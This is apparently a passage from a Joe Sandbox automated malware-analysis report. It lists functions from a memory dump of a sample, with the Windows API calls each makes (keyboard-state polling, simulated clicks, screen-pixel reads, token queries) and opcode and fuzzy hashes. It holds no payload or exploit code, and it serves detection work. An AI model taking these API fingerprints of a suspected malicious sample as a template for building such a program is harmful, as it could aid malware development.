Part of subcall function 005D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00637896,?,?,00000000), ref: 005D5A2C
Part of subcall function 005D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00637896,?,?,00000000,?,?), ref: 005D5A50

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 579cc4f64282f669cca434d94df3f1940f8dfe2ce98b92af6b235783e251918a
Instruction ID: 6c953e98ddd190339435afd4268e05e01857ea1471efd49c9e4ef7fe8f1e5ca3
Opcode Fuzzy Hash: 579cc4f64282f669cca434d94df3f1940f8dfe2ce98b92af6b235783e251918a
Instruction Fuzzy Hash: 3D511935A0460ADFCB10EFA8C4889ADBBF6FF49310B148066E855AB312DB31ED45CF91

Function 0063E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0063E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0063E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0063E687

Part of subcall function 005D9837: __itow.LIBCMT ref: 005D9862
Part of subcall function 005D9837: __swprintf.LIBCMT ref: 005D98AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0063E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0063E6B4

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 299e923bd73ccb20d4f111c8530d0365b05c62e04b2418b62f08525181869e59
Instruction ID: a8cfe993c464b723cfa04606f88d0278f56a4f1a467f1c6d658b84140b6f69f9
Opcode Fuzzy Hash: 299e923bd73ccb20d4f111c8530d0365b05c62e04b2418b62f08525181869e59
Instruction Fuzzy Hash: E7510C75A00205DFCB11EF68C9859ADBBF5FF49314F148096E909AB362CB31ED51DB60

Function 005D2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 005D2357
ScreenToClient.USER32(006957B0,?), ref: 005D2374
GetAsyncKeyState.USER32(00000001), ref: 005D2399
GetAsyncKeyState.USER32(00000002), ref: 005D23A7

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: b2fa3d02390a8f6cd3a6e8378d7226fb84c0101ab459908feeacae00235d3cdd
Instruction ID: a109caea11e39c4bd626a2f70526adb866fea9d479601f6b16eab19fa39c326b
Opcode Fuzzy Hash: b2fa3d02390a8f6cd3a6e8378d7226fb84c0101ab459908feeacae00235d3cdd
Instruction Fuzzy Hash: 7441AF35604205FBCF299F68C844AEABB76FB15320F20431BF829932E0C7319954DF91

Function 006263AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006263E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00626433
TranslateMessage.USER32(?), ref: 0062645C
DispatchMessageW.USER32(?), ref: 00626466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00626475

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 6bd98a8a11e4e7aa1298c4f41470671d41142dba8ce44ef4a98f648bc4ea97ca
Instruction ID: 03a5bd61d05c4051b1405b649f0aee16c450186dd73d84c686b0c7739797ef48
Opcode Fuzzy Hash: 6bd98a8a11e4e7aa1298c4f41470671d41142dba8ce44ef4a98f648bc4ea97ca
Instruction Fuzzy Hash: CF310631900A229FDB21DFB0EC44BF67BEFAB00300F109166F462C36A0E7259545CF51

Function 00628A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00628A30
PostMessageW.USER32(?,00000201,00000001), ref: 00628ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00628AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00628AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00628AF8

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 4e7993cf4a47eac1250195e62cafaa4b569fbf67e35fbca135893090e09d613c
Instruction ID: 33984f0faf8db857ec07e552afc23d4ff47ca333acc67920e0987c3d013e7aa1
Opcode Fuzzy Hash: 4e7993cf4a47eac1250195e62cafaa4b569fbf67e35fbca135893090e09d613c
Instruction Fuzzy Hash: DC31AF71501629EFDB14CF68ED48ADE3BB6EB04316F108229F925A72D1CBB09914DF90

Function 0062B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0062B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0062B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0062B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0062B27F
_wcsstr.LIBCMT ref: 0062B289

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: c4f22e288453376332970c49264cc9c2c113ad720df73e95e92d5be9e8126c30
Instruction ID: 515f6fe3e69f33fa9f3b67cae074a6780fec0c708fc4000db6879e865977e8f3
Opcode Fuzzy Hash: c4f22e288453376332970c49264cc9c2c113ad720df73e95e92d5be9e8126c30
Instruction Fuzzy Hash: 2E216732205715BBEB109B34AC09EBF7F9EDF89710F005039F904CA1A2EF65DD409AA0

Function 0065B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 005D2612: GetWindowLongW.USER32(?,000000EB), ref: 005D2623

GetWindowLongW.USER32(?,000000F0), ref: 0065B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0065B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0065B1CF
GetSystemMetrics.USER32(00000004), ref: 0065B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00640E90,00000000), ref: 0065B216

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: a0985a41caf53d30b339df84712c5c8a51451ba75ec5d9655308185b214293c4
Instruction ID: 1fcd687d9693c9fb8eaddaa735316ac78b9b003a3586fa40ca9c9a2c340108d0
Opcode Fuzzy Hash: a0985a41caf53d30b339df84712c5c8a51451ba75ec5d9655308185b214293c4
Instruction Fuzzy Hash: 0421B571910665AFCB209F38DC18AAA3BA6FB05362F145739FD32D72E0E7309915CB90

Function 00629307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00629320

Part of subcall function 005D7BCC: _memmove.LIBCMT ref: 005D7C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00629352
__itow.LIBCMT ref: 0062936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00629392
__itow.LIBCMT ref: 006293A3

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 61b07a80de9781f3a1b7c2921e3cf3328b82f07dcff20341c31bde60d8f5da82
Instruction ID: e99060de8a8a7cff2177e44f4a8ce4fc9f2d97eda3562a385a124e9fc3f54a11
Opcode Fuzzy Hash: 61b07a80de9781f3a1b7c2921e3cf3328b82f07dcff20341c31bde60d8f5da82
Instruction Fuzzy Hash: AD21C831700619ABDB10EB649C89EEE7BAAFBC9710F044026F905D73D1E6708D458BB1

Function 00645A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00645A6E
GetForegroundWindow.USER32 ref: 00645A85
GetDC.USER32(00000000), ref: 00645AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00645ACD
ReleaseDC.USER32(00000000,00000003), ref: 00645B08

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 6a775ca1a928070f859bd833df7ea9331ea6d87413c00acd5a079bef3046493c
Instruction ID: e8e26da6afab61425f101330064a5f0a2938a9df7b2977cf68d25c0ef6f3ec4d
Opcode Fuzzy Hash: 6a775ca1a928070f859bd833df7ea9331ea6d87413c00acd5a079bef3046493c
Instruction Fuzzy Hash: 47218435A00204AFD714EF69DC88AAABBF6EF48311F148479F84AD7352CB70AD41CB90

Function 005D12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005D134D
SelectObject.GDI32(?,00000000), ref: 005D135C
BeginPath.GDI32(?), ref: 005D1373
SelectObject.GDI32(?,00000000), ref: 005D139C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: c9daa1002dd67506703f60b84f4677859153e1a6914ffbe306a15beeafcc09c4
Instruction ID: e2c030907f8760fba6f8d0daaf4b7cead398fde79fe22be9f8ffd56b46b0caa6
Opcode Fuzzy Hash: c9daa1002dd67506703f60b84f4677859153e1a6914ffbe306a15beeafcc09c4
Instruction Fuzzy Hash: B9219230911B18EFDB22DF19DD047697BAAFB00322F185617F412966B0D7719891CF94

Function 00634A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00634ABA
__beginthreadex.LIBCMT ref: 00634AD8
MessageBoxW.USER32(?,?,?,?), ref: 00634AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00634B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00634B0A

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 3d51a3e5d0ad0ccbaaf0079d9d6cd85c82d1aed900b5b3bf78860379e3279fa3
Instruction ID: f4eee6fc0f364e34ec41175ad6fd727a64f8f82cabf6d8e4792f18197217aba6
Opcode Fuzzy Hash: 3d51a3e5d0ad0ccbaaf0079d9d6cd85c82d1aed900b5b3bf78860379e3279fa3
Instruction Fuzzy Hash: 1F110876905608BBD7119FA8DC08ADBBFAEEB45321F14426AF915D3350DA71D90087E0

Function 00628202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0062821E
GetLastError.KERNEL32(?,00627CE2,?,?,?), ref: 00628228
GetProcessHeap.KERNEL32(00000008,?,?,00627CE2,?,?,?), ref: 00628237
HeapAlloc.KERNEL32(00000000,?,00627CE2,?,?,?), ref: 0062823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00628255

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 12e756b4582d1ccd3acc4d7f904448f124ddc8591557f353f96e0a7f06d213b4
Instruction ID: 952ca336c1ccba7095c6ca9e3aa7d18f6e11ccc84d6214de6617012258ceb636
Opcode Fuzzy Hash: 12e756b4582d1ccd3acc4d7f904448f124ddc8591557f353f96e0a7f06d213b4
Instruction Fuzzy Hash: 0A011271602715FFDB208FA5EC48DAB7B6EEF85755B500569F849C3260DA319D00DAA0

Function 0062710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00627044,80070057,?,?,?,00627455), ref: 00627127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00627044,80070057,?,?), ref: 00627142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00627044,80070057,?,?), ref: 00627150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00627044,80070057,?), ref: 00627160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00627044,80070057,?,?), ref: 0062716C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 41efe542a24f3bfe90bdfdfe46b64682ce59a447b3c9586c17588d571bcb7029
Instruction ID: bd20743391fc7aab866bd2b2620da1b467bd9f8f549c9d3a7b450b3bef017f03
Opcode Fuzzy Hash: 41efe542a24f3bfe90bdfdfe46b64682ce59a447b3c9586c17588d571bcb7029
Instruction Fuzzy Hash: E5018F72A01724BBDB118F64EC48FAA7BBEEF44792F180064FD04D6220D731DD519BA0

Function 00635244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00635260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0063526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00635276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00635280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006352BC

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 38c3aab0dccb712b2db35fe4f6f0a492968225f58fde123d8611e68056842981
Instruction ID: 9fad07eecb4da5d138cf9fa77e6207c7d5d4d92cb3e39e017e2376a5ba454466
Opcode Fuzzy Hash: 38c3aab0dccb712b2db35fe4f6f0a492968225f58fde123d8611e68056842981
Instruction Fuzzy Hash: 02012931D01A1DDBCF14EFE4E8499EEBB7AFB09712F400556E946B3290CB30965087A5

Function 0062810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00628121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0062812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0062813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00628141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00628157

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 2bab3f6dbe1af47dacc02af88216d68284127ec2ddc73630072e0d122528eedf
Instruction ID: 5dca8e45248dda2a3c197e8956d6951369fe0f5162c51c82e90dfe4ffc4ce68f
Opcode Fuzzy Hash: 2bab3f6dbe1af47dacc02af88216d68284127ec2ddc73630072e0d122528eedf
Instruction Fuzzy Hash: 10F0C270202726AFEB214FA4EC8DEAB3BAEFF49755F000025F985C3290CB619C51DE60

Function 0062C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0062C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 0062C20E
MessageBeep.USER32(00000000), ref: 0062C226
KillTimer.USER32(?,0000040A), ref: 0062C242
EndDialog.USER32(?,00000001), ref: 0062C25C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 9d3e2efc956aa842e2556308446ca4d67db0109e92db9d1a6f2a45b825d617d9
Instruction ID: 1cbb6c4f47a6b9aafcd20a14a701b32b997024115651227cb891e767d7bf9382
Opcode Fuzzy Hash: 9d3e2efc956aa842e2556308446ca4d67db0109e92db9d1a6f2a45b825d617d9
Instruction Fuzzy Hash: 1001A730404B1497EB20AB64ED4EF9677BABF00706F00026AB542915E0DBE069448F50

Function 005D13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 005D13BF
StrokeAndFillPath.GDI32(?,?,0060B888,00000000,?), ref: 005D13DB
SelectObject.GDI32(?,00000000), ref: 005D13EE
DeleteObject.GDI32 ref: 005D1401
StrokePath.GDI32(?), ref: 005D141C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 4295c2a913c7cf10e46d0f95c64a76269a9de44e42b84e93aca947558b844ee9
Instruction ID: 5f5dbfcd43a9a21758af44be8fd4c5355021129999ffa7d034468f056421206f
Opcode Fuzzy Hash: 4295c2a913c7cf10e46d0f95c64a76269a9de44e42b84e93aca947558b844ee9
